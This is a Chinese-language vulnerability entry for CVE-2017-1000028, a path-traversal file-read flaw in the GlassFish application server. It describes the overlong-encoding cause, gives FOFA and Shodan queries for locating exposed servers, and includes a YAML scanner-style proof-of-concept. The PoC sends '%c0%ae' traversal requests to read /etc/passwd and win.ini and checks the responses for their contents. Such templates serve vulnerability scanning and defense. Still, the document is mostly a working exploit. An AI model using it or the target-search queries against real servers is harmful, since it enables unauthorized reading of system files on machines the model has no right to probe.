漏洞描述
GlassFish是一款强健的商业兼容应用服务器,达到产品级质量,可免费用于开发、部署和重新分发。开发者可以免费获得源代码,还可以对代码进行更改。GlassFish漏洞成因:java语义中会把"%c0%ae"解析为"\uC0AE",最后转义为ASCCII字符的"."
fofa: fid="90r39jo6/0uRhK8ILW65Lw=="
shodan: http.html:"GlassFish"
CVE-2017-1000028: GlassFish LFI
PoC代码[已公开]
id: CVE-2017-1000028
info:
name: GlassFish LFI
author: sharecast
severity: high
verified: false
description: |-
GlassFish是一款强健的商业兼容应用服务器,达到产品级质量,可免费用于开发、部署和重新分发。开发者可以免费获得源代码,还可以对代码进行更改。GlassFish漏洞成因:java语义中会把"%c0%ae"解析为"\uC0AE",最后转义为ASCCII字符的"."
fofa: fid="90r39jo6/0uRhK8ILW65Lw=="
shodan: http.html:"GlassFish"
tags: cve,cve2017,lfi,glassfish
created: 2023/08/10
rules:
r0:
request:
method: GET
path: /theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
r1:
request:
method: POST
path: /theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini
expression: response.status == 200 && response.body.bcontains(b"bit app support") && response.body.bcontains(b"fonts") && response.body.bcontains(b"extensions")
expression: r0() || r1()